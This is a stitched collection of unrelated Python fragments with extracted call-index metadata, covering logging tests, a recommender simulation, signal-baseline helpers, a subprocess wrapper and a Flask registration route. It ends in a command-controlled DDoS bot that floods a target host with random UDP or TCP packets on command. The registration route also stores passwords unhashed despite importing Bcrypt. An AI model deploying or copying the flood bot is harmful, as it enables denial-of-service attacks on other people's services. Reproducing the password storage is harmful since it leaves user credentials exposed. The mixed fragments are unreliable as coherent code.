assert writer.read() == "[2000 01 01 18:00:05] Frozen\n"
| [
"datetime.datetime",
"loguru.logger.add",
"loguru.logger.debug",
"loguru.logger.info",
"re.fullmatch",
"pytest.mark.parametrize",
"freezegun.freeze_time"
] | [((184, 2850), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""time_format, date, timezone, expected"""', "[('%Y-%m-%d %H-%M-%S %f %Z %z', '2018-06-09 01:02:03.000045', ('UTC', 0),\n '2018-06-09 01-02-03 000045 UTC +0000'), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ', '2018-06-09 01:02:03.000045', (\n 'UTC', 0), '2018-06-09 01-02-03 000045 UTC +0000'), (\n '%Y-%m-%d %H-%M-%S %f %Z %z', '2018-06-09 01:02:03.000045', ('EST', -\n 18000), '2018-06-09 01-02-03 000045 EST -0500'), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ', '2018-06-09 01:02:03.000045', (\n 'EST', -18000), '2018-06-09 01-02-03 000045 EST -0500'), (\n '%Y-%m-%d %H-%M-%S %f %Z!UTC', '2018-06-09 01:02:03.000045', ('UTC', 0),\n '2018-06-09 01-02-03 000045 %s' % UTC_NAME), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz!UTC', '2018-06-09 01:02:03.000045', (\n 'UTC', 0), '2018-06-09 01-02-03 000045 %s' % UTC_NAME), (\n '%Y-%m-%d %H-%M-%S %f %Z %z!UTC', '2018-06-09 01:02:03.000045', ('EST',\n -18000), '2018-06-09 06-02-03 000045 %s +0000' % UTC_NAME), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ!UTC', '2018-06-09 01:02:03.000045', (\n 'UTC', -18000), '2018-06-09 06-02-03 000045 %s +0000' % UTC_NAME), (\n 'YY-M-D H-m-s SSS Z', '2005-04-07 09:03:08.002320', ('A', 3600),\n '05-4-7 9-3-8 002 +01:00'), ('Q_DDDD_DDD d_E h_hh A SS ZZ',\n '2000-01-01 14:00:00.9', ('B', -1800), '1_001_1 5_6 2_02 PM 90 -0030'),\n ('hh A', '2018-01-01 00:01:02.000003', ('UTC', 0), '12 AM'), ('hh A',\n '2018-01-01 12:00:00.0', ('UTC', 0), '12 PM'), ('hh A',\n '2018-01-01 23:00:00.0', ('UTC', 0), '11 PM'), ('[YYYY] MM [DD]',\n '2018-02-03 11:09:00.000002', ('UTC', 0), 'YYYY 02 DD'), (\n '[YYYY MM DD]', '2018-01-03 11:03:04.000002', ('UTC', 0),\n '[2018 01 03]'), ('[[YY]]', '2018-01-03 11:03:04.000002', ('UTC', 0),\n '[YY]'), ('[]', '2018-01-03 11:03:04.000002', ('UTC', 0), '[]'), (\n '[HHmmss', '2018-01-03 11:03:04.000002', ('UTC', 0), '[110304'), (\n 'HHmmss]', '2018-01-03 11:03:04.000002', ('UTC', 0), '110304]'), (\n 'HH:mm:ss!UTC', '2018-01-01 11:30:00.0', ('A', 7200), '09:30:00'), (\n 'UTC! HH:mm:ss', '2018-01-01 11:30:00.0', ('A', 7200), 'UTC! 11:30:00'),\n ('!UTC HH:mm:ss', '2018-01-01 11:30:00.0', ('A', 7200), '!UTC 11:30:00'\n ), ('hh:mm:ss A - Z ZZ !UTC', '2018-01-01 12:30:00.0', ('A', 5400),\n '11:00:00 AM - +00:00 +0000 '), ('YYYY-MM-DD HH:mm:ss[Z]!UTC',\n '2018-01-03 11:03:04.2', ('XYZ', -7200), '2018-01-03 13:03:04Z'), (\n 'HH:mm:ss[!UTC]', '2018-01-01 11:30:00.0', ('A', 7200), '11:30:00!UTC'),\n ('', '2018-02-03 11:09:00.000002', ('Z', 1800),\n '2018-02-03T11:09:00.000002+0030'), ('!UTC',\n '2018-02-03 11:09:00.000002', ('Z', 1800),\n '2018-02-03T10:39:00.000002+0000')]"], {}), "('time_format, date, timezone, expected', [(\n '%Y-%m-%d %H-%M-%S %f %Z %z', '2018-06-09 01:02:03.000045', ('UTC', 0),\n '2018-06-09 01-02-03 000045 UTC +0000'), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ', '2018-06-09 01:02:03.000045', (\n 'UTC', 0), '2018-06-09 01-02-03 000045 UTC +0000'), (\n '%Y-%m-%d %H-%M-%S %f %Z %z', '2018-06-09 01:02:03.000045', ('EST', -\n 18000), '2018-06-09 01-02-03 000045 EST -0500'), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ', '2018-06-09 01:02:03.000045', (\n 'EST', -18000), '2018-06-09 01-02-03 000045 EST -0500'), (\n '%Y-%m-%d %H-%M-%S %f %Z!UTC', '2018-06-09 01:02:03.000045', ('UTC', 0),\n '2018-06-09 01-02-03 000045 %s' % UTC_NAME), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz!UTC', '2018-06-09 01:02:03.000045', (\n 'UTC', 0), '2018-06-09 01-02-03 000045 %s' % UTC_NAME), (\n '%Y-%m-%d %H-%M-%S %f %Z %z!UTC', '2018-06-09 01:02:03.000045', ('EST',\n -18000), '2018-06-09 06-02-03 000045 %s +0000' % UTC_NAME), (\n 'YYYY-MM-DD HH-mm-ss SSSSSS zz ZZ!UTC', '2018-06-09 01:02:03.000045', (\n 'UTC', -18000), '2018-06-09 06-02-03 000045 %s +0000' % UTC_NAME), (\n 'YY-M-D H-m-s SSS Z', '2005-04-07 09:03:08.002320', ('A', 3600),\n '05-4-7 9-3-8 002 +01:00'), ('Q_DDDD_DDD d_E h_hh A SS ZZ',\n '2000-01-01 14:00:00.9', ('B', -1800), '1_001_1 5_6 2_02 PM 90 -0030'),\n ('hh A', '2018-01-01 00:01:02.000003', ('UTC', 0), '12 AM'), ('hh A',\n '2018-01-01 12:00:00.0', ('UTC', 0), '12 PM'), ('hh A',\n '2018-01-01 23:00:00.0', ('UTC', 0), '11 PM'), ('[YYYY] MM [DD]',\n '2018-02-03 11:09:00.000002', ('UTC', 0), 'YYYY 02 DD'), (\n '[YYYY MM DD]', '2018-01-03 11:03:04.000002', ('UTC', 0),\n '[2018 01 03]'), ('[[YY]]', '2018-01-03 11:03:04.000002', ('UTC', 0),\n '[YY]'), ('[]', '2018-01-03 11:03:04.000002', ('UTC', 0), '[]'), (\n '[HHmmss', '2018-01-03 11:03:04.000002', ('UTC', 0), '[110304'), (\n 'HHmmss]', '2018-01-03 11:03:04.000002', ('UTC', 0), '110304]'), (\n 'HH:mm:ss!UTC', '2018-01-01 11:30:00.0', ('A', 7200), '09:30:00'), (\n 'UTC! HH:mm:ss', '2018-01-01 11:30:00.0', ('A', 7200), 'UTC! 11:30:00'),\n ('!UTC HH:mm:ss', '2018-01-01 11:30:00.0', ('A', 7200), '!UTC 11:30:00'\n ), ('hh:mm:ss A - Z ZZ !UTC', '2018-01-01 12:30:00.0', ('A', 5400),\n '11:00:00 AM - +00:00 +0000 '), ('YYYY-MM-DD HH:mm:ss[Z]!UTC',\n '2018-01-03 11:03:04.2', ('XYZ', -7200), '2018-01-03 13:03:04Z'), (\n 'HH:mm:ss[!UTC]', '2018-01-01 11:30:00.0', ('A', 7200), '11:30:00!UTC'),\n ('', '2018-02-03 11:09:00.000002', ('Z', 1800),\n '2018-02-03T11:09:00.000002+0030'), ('!UTC',\n '2018-02-03 11:09:00.000002', ('Z', 1800),\n '2018-02-03T10:39:00.000002+0000')])\n", (207, 2850), False, 'import pytest\n'), ((3954, 3998), 'datetime.datetime', 'datetime.datetime', (['(2011)', '(1)', '(1)', '(22)', '(22)', '(22)', '(0)'], {}), '(2011, 1, 1, 22, 22, 22, 0)\n', (3971, 3998), False, 'import datetime\n'), ((5187, 5254), 'loguru.logger.add', 'logger.add', (['writer'], {'format': '"""[{time:YYYY MM DD HH:mm:ss}] {message}"""'}), "(writer, format='[{time:YYYY MM DD HH:mm:ss}] {message}')\n", (5197, 5254), False, 'from loguru import logger\n'), ((3743, 3795), 'loguru.logger.add', 'logger.add', (['writer'], {'format': "('{time:%s}' % time_format)"}), "(writer, format='{time:%s}' % time_format)\n", (3753, 3795), False, 'from loguru import logger\n'), ((3804, 3821), 'loguru.logger.debug', 'logger.debug', (['"""X"""'], {}), "('X')\n", (3816, 3821), False, 'from loguru import logger\n'), ((4033, 4086), 'loguru.logger.add', 'logger.add', (['writer'], {'format': '"""{time:MMMM MMM dddd ddd}"""'}), "(writer, format='{time:MMMM MMM dddd ddd}')\n", (4043, 4086), False, 'from loguru import logger\n'), ((4095, 4115), 'loguru.logger.debug', 'logger.debug', (['"""Test"""'], {}), "('Test')\n", (4107, 4115), False, 'from loguru import logger\n'), ((4294, 4365), 'loguru.logger.add', 'logger.add', (['sys.stdout'], {'format': '"""{time:YYYY [MM] DD HHmmss Z} {message}"""'}), "(sys.stdout, format='{time:YYYY [MM] DD HHmmss Z} {message}')\n", (4304, 4365), False, 'from loguru import logger\n'), ((4374, 4391), 'loguru.logger.debug', 'logger.debug', (['"""Y"""'], {}), "('Y')\n", (4386, 4391), False, 'from loguru import logger\n'), ((4627, 4685), 'loguru.logger.add', 'logger.add', (["(tmp_path / '{time:YYYY [MM] DD HHmmss ZZ}.log')"], {}), "(tmp_path / '{time:YYYY [MM] DD HHmmss ZZ}.log')\n", (4637, 4685), False, 'from loguru import logger\n'), ((4694, 4711), 'loguru.logger.debug', 'logger.debug', (['"""Z"""'], {}), "('Z')\n", (4706, 4711), False, 'from loguru import logger\n'), ((4936, 5004), 'loguru.logger.add', 'logger.add', (['writer'], {'format': '"""{time:YYYY MM DD HH mm ss SSSSSS ZZ zz}"""'}), "(writer, format='{time:YYYY MM DD HH mm ss SSSSSS ZZ zz}')\n", (4946, 5004), False, 'from loguru import logger\n'), ((5013, 5030), 'loguru.logger.debug', 'logger.debug', (['"""X"""'], {}), "('X')\n", (5025, 5030), False, 'from loguru import logger\n'), ((5078, 5145), 're.fullmatch', 're.fullmatch', (['"""2011 01 02 03 04 05 600000 [+-]\\\\d{4} .*\\\\n"""', 'result'], {}), "('2011 01 02 03 04 05 600000 [+-]\\\\d{4} .*\\\\n', result)\n", (5090, 5145), False, 'import re\n'), ((5265, 5309), 'freezegun.freeze_time', 'freezegun.freeze_time', (['"""2000-01-01 18:00:05"""'], {}), "('2000-01-01 18:00:05')\n", (5286, 5309), False, 'import freezegun\n'), ((5319, 5340), 'loguru.logger.info', 'logger.info', (['"""Frozen"""'], {}), "('Frozen')\n", (5330, 5340), False, 'from loguru import logger\n')] |
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.linear_model import LogisticRegression
import pdb
from sklearn.metrics import *
import matplotlib.pyplot as plt
from sklearn import preprocessing
from sklearn.preprocessing import StandardScaler
import itertools
import json
import pickle
class User:
def __init__(self, id):
self.id = id
self.positive = []
self.negative = []
def add_positive(self, movie_id):
self.positive.append(movie_id)
def add_negative(self, movie_id):
self.negative.append(movie_id)
def get_positive(self):
return self.positive
def get_negative(self):
return self.negative
np.random.seed(1)
class EventsGenerator:
NUM_OF_USERS = 1
def __init__(self, learning_data, buy_probability, opened):
self.learning_data = learning_data
self.buy_probability = buy_probability
self.users = []
self.NUM_OF_OPENED_MOVIES_PER_USER = opened
for id in range(1, self.NUM_OF_USERS+1):
self.users.append(User(id))
def run(self, pairwise=False):
# print (self.users, "hellp")
for user in self.users:
# print (self.learning_data.index)
opened_movies = np.random.choice(self.learning_data.index.values, self.NUM_OF_OPENED_MOVIES_PER_USER)
self.__add_positives_and_negatives_to(user, opened_movies)
return self.__build_events_data()
def __add_positives_and_negatives_to(self, user, opened_movies):
# print (opened_movies)
for movie_id in opened_movies:
if np.random.binomial(1, self.buy_probability.loc[movie_id]):
user.add_positive(movie_id)
else:
user.add_negative(movie_id)
def __build_events_data(self):
events_data = []
for user in self.users:
for positive_id in user.get_positive():
# print(positive_id)
tmp = self.learning_data.loc[positive_id].to_dict()
tmp['outcome'] = 1
events_data += [tmp]
for negative_id in user.get_negative():
tmp = self.learning_data.loc[negative_id].to_dict()
tmp['outcome'] = 0
events_data += [tmp]
# print(events_data)
return pd.DataFrame(events_data)
def build_learning_data_from(movie_data):
feature_columns = np.setdiff1d(movie_data.columns, np.array(['top_prob']))
learning_data = movie_data.loc[:, feature_columns]
scaler = StandardScaler()
for i in range(feature_columns.shape[0]):
learning_data[feature_columns[i]] = scaler.fit_transform(learning_data[[feature_columns[i]]])
return learning_data, feature_columns
def get_test_train_data(events_data, feature_columns):
X = events_data.loc[:, feature_columns].values.astype(np.float32)
y = events_data.loc[:, ['outcome']].values.astype(np.float32).ravel()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
return [X_train, X_test, y_train, y_test]
def get_predicted_outcome(model, data):
return np.argmax(model.predict_proba(data), axis=1).astype(np.float32)
def get_predicted_rank(model, data):
return model.predict_proba(data)[:, 1]
def train_model(model, prediction_function, X_train, y_train, X_test, y_test):
model.fit(X_train, y_train)
y_train_pred = prediction_function(model, X_train)
y_test_pred = prediction_function(model, X_test)
return model, precision_score(y_train, y_train_pred), recall_score(y_train, y_train_pred), accuracy_score(y_train, y_train_pred),\
precision_score(y_test, y_test_pred), recall_score(y_test, y_test_pred), accuracy_score(y_test, y_test_pred)
def decide_rank(model, learning_data, predict_fun):
lg_input = learning_data.values.astype(np.float32)
learning_data_with_rank = learning_data.copy()
learning_data_with_rank['rank'] = predict_fun(model, lg_input)
return learning_data_with_rank | [
"sklearn.model_selection.train_test_split",
"numpy.random.choice",
"sklearn.preprocessing.StandardScaler",
"numpy.array",
"numpy.random.seed",
"pandas.DataFrame",
"numpy.random.binomial"
] | [((801, 818), 'numpy.random.seed', 'np.random.seed', (['(1)'], {}), '(1)\n', (815, 818), True, 'import numpy as np\n'), ((2715, 2731), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (2729, 2731), False, 'from sklearn.preprocessing import StandardScaler\n'), ((3169, 3223), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(X, y, test_size=0.2, random_state=42)\n', (3185, 3223), False, 'from sklearn.model_selection import train_test_split\n'), ((2493, 2518), 'pandas.DataFrame', 'pd.DataFrame', (['events_data'], {}), '(events_data)\n', (2505, 2518), True, 'import pandas as pd\n'), ((2618, 2640), 'numpy.array', 'np.array', (["['top_prob']"], {}), "(['top_prob'])\n", (2626, 2640), True, 'import numpy as np\n'), ((1373, 1463), 'numpy.random.choice', 'np.random.choice', (['self.learning_data.index.values', 'self.NUM_OF_OPENED_MOVIES_PER_USER'], {}), '(self.learning_data.index.values, self.\n NUM_OF_OPENED_MOVIES_PER_USER)\n', (1389, 1463), True, 'import numpy as np\n'), ((1730, 1787), 'numpy.random.binomial', 'np.random.binomial', (['(1)', 'self.buy_probability.loc[movie_id]'], {}), '(1, self.buy_probability.loc[movie_id])\n', (1748, 1787), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
"""Helper functions for pybaselines.
Created on March 5, 2021
@author: <NAME>
"""
import numpy as np
# the minimum positive float values such that a + _MIN_FLOAT != a
_MIN_FLOAT = np.finfo(float).eps
def relative_difference(old, new, norm_order=None):
"""
Calculates the relative difference (norm(new-old) / norm(old)) of two values.
Used as an exit criteria in many baseline algorithms.
Parameters
----------
old : numpy.ndarray or float
The array or single value from the previous iteration.
new : numpy.ndarray or float
The array or single value from the current iteration.
norm_order : int, optional
The type of norm to calculate. Default is None, which is l2
norm for arrays, abs for scalars.
Returns
-------
float
The relative difference between the old and new values.
"""
numerator = np.linalg.norm(new - old, norm_order)
denominator = np.maximum(np.linalg.norm(old, norm_order), _MIN_FLOAT)
return numerator / denominator
def gaussian(x, height=1.0, center=0.0, sigma=1.0):
"""
Generates a gaussian distribution based on height, center, and sigma.
Parameters
----------
x : numpy.ndarray
The x-values at which to evaluate the distribution.
height : float, optional
The maximum height of the distribution. Default is 1.0.
center : float, optional
The center of the distribution. Default is 0.0.
sigma : float, optional
The standard deviation of the distribution. Default is 1.0.
Returns
-------
numpy.ndarray
The gaussian distribution evaluated with x.
"""
return height * np.exp(-0.5 * ((x - center)**2) / sigma**2)
def gaussian_kernel(window_size, sigma=1.0):
"""
Creates an area-normalized gaussian kernel for convolution.
Parameters
----------
window_size : int
The number of points for the entire kernel.
sigma : float, optional
The standard deviation of the gaussian model.
Returns
-------
numpy.ndarray, shape (window_size,)
The area-normalized gaussian kernel.
Notes
-----
Return gaus/sum(gaus) rather than creating a unit-area gaussian
since the unit-area gaussian would have an area smaller than 1
for window_size < ~ 6 * sigma.
"""
# centers distribution from -half_window to half_window
x = np.arange(0, window_size) - (window_size - 1) / 2
gaus = gaussian(x, 1, 0, sigma)
return gaus / np.sum(gaus)
def _get_edges(data, pad_length, mode='extrapolate', extrapolate_window=None, **pad_kwargs):
"""
Provides the left and right edges for padding data.
Parameters
----------
data : array-like
The array of the data.
pad_length : int
The number of points to add to the left and right edges.
mode : str, optional
The method for padding. Default is 'extrapolate'. Any method other than
'extrapolate' will use numpy.pad.
extrapolate_window : int, optional
The number of values to use for linear fitting on the left and right
edges. Default is None, which will set the extrapolate window size equal
to the `half_window` size.
**pad_kwargs
Any keyword arguments to pass to numpy.pad, which will be used if `mode`
is not 'extrapolate'.
Returns
-------
left_edge : numpy.ndarray, shape(pad_length,)
The array of data for the left padding.
right_edge : numpy.ndarray, shape(pad_length,)
The array of data for the right padding.
Notes
-----
If mode is 'extrapolate', then the left and right edges will be fit with
a first order polynomial and then extrapolated. Otherwise, uses numpy.pad.
"""
y = np.asarray(data)
if pad_length == 0:
return y
mode = mode.lower()
if mode == 'extrapolate':
if extrapolate_window is None:
extrapolate_window = 2 * pad_length + 1
x = np.arange(-pad_length, y.shape[0] + pad_length)
left_poly = np.polynomial.Polynomial.fit(
x[pad_length:-pad_length][:extrapolate_window],
y[:extrapolate_window], 1
)
right_poly = np.polynomial.Polynomial.fit(
x[pad_length:-pad_length][-extrapolate_window:],
y[-extrapolate_window:], 1
)
left_edge = left_poly(x[:pad_length])
right_edge = right_poly(x[-pad_length:])
else:
padded_data = np.pad(y, pad_length, mode, **pad_kwargs)
left_edge = padded_data[:pad_length]
right_edge = padded_data[-pad_length:]
return left_edge, right_edge
def pad_edges(data, pad_length, mode='extrapolate',
extrapolate_window=None, **pad_kwargs):
"""
Adds left and right edges to the data.
Parameters
----------
data : array-like
The array of the data.
pad_length : int
The number of points to add to the left and right edges.
mode : str, optional
The method for padding. Default is 'extrapolate'. Any method other than
'extrapolate' will use numpy.pad.
extrapolate_window : int, optional
The number of values to use for linear fitting on the left and right
edges. Default is None, which will set the extrapolate window size equal
to the `half_window` size.
**pad_kwargs
Any keyword arguments to pass to numpy.pad, which will be used if `mode`
is not 'extrapolate'.
Returns
-------
padded_data : numpy.ndarray, shape (N + 2 * half_window,)
The data with padding on the left and right edges.
Notes
-----
If mode is 'extrapolate', then the left and right edges will be fit with
a first order polynomial and then extrapolated. Otherwise, uses numpy.pad.
"""
y = np.asarray(data)
if pad_length == 0:
return y
if mode.lower() == 'extrapolate':
left_edge, right_edge = _get_edges(y, pad_length, mode, extrapolate_window)
padded_data = np.concatenate((left_edge, y, right_edge))
else:
padded_data = np.pad(y, pad_length, mode.lower(), **pad_kwargs)
return padded_data
def padded_convolve(data, kernel, mode='reflect', **pad_kwargs):
"""
Pads data before convolving to reduce edge effects.
Parameters
----------
data : numpy.ndarray, shape (N,)
The data to smooth.
kernel : numpy.ndarray, shape (M,)
A pre-computed, normalized kernel for the convolution. Indices should
span from -half_window to half_window.
Returns
-------
numpy.ndarray, shape (N,)
The smoothed input array.
Notes
-----
Mirrors the data near the edges so that convolution does not
produce edge effects.
"""
padding = (min(data.shape[0], kernel.shape[0]) // 2)
convolution = np.convolve(
pad_edges(data, padding, mode, **pad_kwargs), kernel, mode='valid'
)
return convolution
| [
"numpy.polynomial.Polynomial.fit",
"numpy.asarray",
"numpy.exp",
"numpy.sum",
"numpy.concatenate",
"numpy.linalg.norm",
"numpy.finfo",
"numpy.pad",
"numpy.arange"
] | [((209, 224), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (217, 224), True, 'import numpy as np\n'), ((919, 956), 'numpy.linalg.norm', 'np.linalg.norm', (['(new - old)', 'norm_order'], {}), '(new - old, norm_order)\n', (933, 956), True, 'import numpy as np\n'), ((3811, 3827), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (3821, 3827), True, 'import numpy as np\n'), ((5866, 5882), 'numpy.asarray', 'np.asarray', (['data'], {}), '(data)\n', (5876, 5882), True, 'import numpy as np\n'), ((986, 1017), 'numpy.linalg.norm', 'np.linalg.norm', (['old', 'norm_order'], {}), '(old, norm_order)\n', (1000, 1017), True, 'import numpy as np\n'), ((1713, 1758), 'numpy.exp', 'np.exp', (['(-0.5 * (x - center) ** 2 / sigma ** 2)'], {}), '(-0.5 * (x - center) ** 2 / sigma ** 2)\n', (1719, 1758), True, 'import numpy as np\n'), ((2441, 2466), 'numpy.arange', 'np.arange', (['(0)', 'window_size'], {}), '(0, window_size)\n', (2450, 2466), True, 'import numpy as np\n'), ((2545, 2557), 'numpy.sum', 'np.sum', (['gaus'], {}), '(gaus)\n', (2551, 2557), True, 'import numpy as np\n'), ((4027, 4074), 'numpy.arange', 'np.arange', (['(-pad_length)', '(y.shape[0] + pad_length)'], {}), '(-pad_length, y.shape[0] + pad_length)\n', (4036, 4074), True, 'import numpy as np\n'), ((4095, 4202), 'numpy.polynomial.Polynomial.fit', 'np.polynomial.Polynomial.fit', (['x[pad_length:-pad_length][:extrapolate_window]', 'y[:extrapolate_window]', '(1)'], {}), '(x[pad_length:-pad_length][:extrapolate_window],\n y[:extrapolate_window], 1)\n', (4123, 4202), True, 'import numpy as np\n'), ((4254, 4364), 'numpy.polynomial.Polynomial.fit', 'np.polynomial.Polynomial.fit', (['x[pad_length:-pad_length][-extrapolate_window:]', 'y[-extrapolate_window:]', '(1)'], {}), '(x[pad_length:-pad_length][-extrapolate_window:\n ], y[-extrapolate_window:], 1)\n', (4282, 4364), True, 'import numpy as np\n'), ((4522, 4563), 'numpy.pad', 'np.pad', (['y', 'pad_length', 'mode'], {}), '(y, pad_length, mode, **pad_kwargs)\n', (4528, 4563), True, 'import numpy as np\n'), ((6069, 6111), 'numpy.concatenate', 'np.concatenate', (['(left_edge, y, right_edge)'], {}), '((left_edge, y, right_edge))\n', (6083, 6111), True, 'import numpy as np\n')] |
import sys
import os
import subprocess
import time
import threading
class Popen(object):
"""
Starts the subprocess with colorful output
Arguments:
command: The command
prefix: The prefix to print before every line
color: The color escape code
"""
def __init__(self, command, prefix = '', color = ''):
self._process = subprocess.Popen(command, stdout=PrefixStdoutPipe(prefix, color), stderr=PrefixStdoutPipe(prefix, colors.fg.red))
def getProcess(self):
return self._process
def terminate(self):
self._process.terminate()
class PrefixStdoutPipe(threading.Thread):
def __init__(self, prefix, color = ''):
self._color = color
self._prefix = prefix
self._readpipe, self._writepipe = os.pipe()
super().__init__()
def fileno(self):
self.start()
return self._writepipe
def finished(self):
os.close(self._writepipe)
def run(self):
inputFile = os.fdopen(self._readpipe)
while True:
line = inputFile.readline()
if len(line) == 0:
break
print(self._color, self._prefix, line.strip(), colors.reset, sep='')
class colors:
reset='\033[0m'
bold='\033[01m'
disable='\033[02m'
underline='\033[04m'
reverse='\033[07m'
strikethrough='\033[09m'
invisible='\033[08m'
class fg:
black='\033[30m'
red='\033[31m'
green='\033[32m'
orange='\033[33m'
blue='\033[34m'
purple='\033[35m'
cyan='\033[36m'
lightgrey='\033[37m'
darkgrey='\033[90m'
lightred='\033[91m'
lightgreen='\033[92m'
yellow='\033[93m'
lightblue='\033[94m'
pink='\033[95m'
lightcyan='\033[96m'
def eof(self):
'''Check whether there is no more content to expect.'''
return not self.is_alive()
if __name__ == '__main__':
command = "ping www.heise.de -c 5".split(" ")
ping_process = subprocess.Popen(command, stdout=subprocess.PIPE)
stdout_reader = PrefixStdoutPipe(process.stdout, "ping: ", colors.fg.red)
stdout_reader.start()
print("Hello, world!")
time.sleep(5)
print("End")
# Let's be tidy and join the threads we've started.
stdout_reader.join()
# Close subprocess' file descriptors.
ping_process.stdout.close()
ping_process.terminate()
| [
"os.close",
"subprocess.Popen",
"time.sleep",
"os.fdopen",
"os.pipe"
] | [((2079, 2128), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'stdout': 'subprocess.PIPE'}), '(command, stdout=subprocess.PIPE)\n', (2095, 2128), False, 'import subprocess\n'), ((2265, 2278), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (2275, 2278), False, 'import time\n'), ((811, 820), 'os.pipe', 'os.pipe', ([], {}), '()\n', (818, 820), False, 'import os\n'), ((956, 981), 'os.close', 'os.close', (['self._writepipe'], {}), '(self._writepipe)\n', (964, 981), False, 'import os\n'), ((1022, 1047), 'os.fdopen', 'os.fdopen', (['self._readpipe'], {}), '(self._readpipe)\n', (1031, 1047), False, 'import os\n')] |
from flask import Blueprint, request, jsonify
from api.models.user_model import User, UserPasswords, db
from flask_bcrypt import Bcrypt
user_bp = Blueprint('user_bp', __name__)
def validate_register_fields(req):
data = req.get_json(silent=True)
fields = ['first_name', 'last_name', 'email', 'password']
for f in fields:
if f not in data:
return False
return True
@user_bp.route('/test', methods=['POST'])
def test():
return f'{validate_register_fields(request)}'
@user_bp.route('/register', methods=['POST'])
def register():
if validate_register_fields(request):
data = request.get_json(silent=True)
first_name = data['first_name']
last_name = data['last_name']
email = data['email']
digest = data['password']
user = User(
first_name=first_name,
last_name=last_name,
email=email,
)
try:
db.session.add(user)
db.session.commit()
except Exception as e:
return(str(e))
try:
user_pw = UserPasswords(
user_id=user.id,
digest=digest
)
db.session.add(user_pw)
db.session.commit()
return jsonify(user.serialize()), 201
except Exception as e:
return str(e)
else:
return jsonify(error='missing required fields with a hot reload!'), 400
| [
"api.models.user_model.User",
"api.models.user_model.db.session.add",
"api.models.user_model.db.session.commit",
"flask.request.get_json",
"api.models.user_model.UserPasswords",
"flask.Blueprint",
"flask.jsonify"
] | [((146, 176), 'flask.Blueprint', 'Blueprint', (['"""user_bp"""', '__name__'], {}), "('user_bp', __name__)\n", (155, 176), False, 'from flask import Blueprint, request, jsonify\n'), ((628, 657), 'flask.request.get_json', 'request.get_json', ([], {'silent': '(True)'}), '(silent=True)\n', (644, 657), False, 'from flask import Blueprint, request, jsonify\n'), ((816, 877), 'api.models.user_model.User', 'User', ([], {'first_name': 'first_name', 'last_name': 'last_name', 'email': 'email'}), '(first_name=first_name, last_name=last_name, email=email)\n', (820, 877), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((950, 970), 'api.models.user_model.db.session.add', 'db.session.add', (['user'], {}), '(user)\n', (964, 970), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((983, 1002), 'api.models.user_model.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1000, 1002), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((1097, 1142), 'api.models.user_model.UserPasswords', 'UserPasswords', ([], {'user_id': 'user.id', 'digest': 'digest'}), '(user_id=user.id, digest=digest)\n', (1110, 1142), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((1201, 1224), 'api.models.user_model.db.session.add', 'db.session.add', (['user_pw'], {}), '(user_pw)\n', (1215, 1224), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((1237, 1256), 'api.models.user_model.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1254, 1256), False, 'from api.models.user_model import User, UserPasswords, db\n'), ((1390, 1449), 'flask.jsonify', 'jsonify', ([], {'error': '"""missing required fields with a hot reload!"""'}), "(error='missing required fields with a hot reload!')\n", (1397, 1449), False, 'from flask import Blueprint, request, jsonify\n')] |
import subprocess
import threading
import time
import socket
import os, sys, random
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = 9998
s.connect((host, port))
def ddos(*args):
def dos(*args):
t1=time.time()
print("started")
host=args[1]
port=args[2]
if args[0] == "udp":
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
else:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bytes=random._urandom(10240)
s.connect((host, int(port)))
send=0
while True:
if not run:
break
s.sendto(bytes, (host,int(port)))
send+=1
#print(str(send)+" Packets Sended Sucessful")
s.close()
print("run time {}".format(time.time()-t1))
print(args)
global run
for n in range(int(args[4])):
threading.Thread(target = dos,args=[*args]).start()
time.sleep(int(args[3]))
run=False
while True:
global run
data = s.recv(1024)
data=data[:].decode("utf-8")
data=data.lower()
if "attack" in data:
s.send(str.encode("done"))
data=data.replace("attack ","")
data=data.split()
run=True
threading.Thread(target = ddos,args=data).start()
elif "kill" in data:
print("here")
run=False
s.send(str.encode("Server Stopped"))
elif "ping" in data:
s.send(str.encode("Pong"))
else:
s.send(str.encode("ERROR"))
except:
continue
| [
"threading.Thread",
"random._urandom",
"time.time",
"socket.socket"
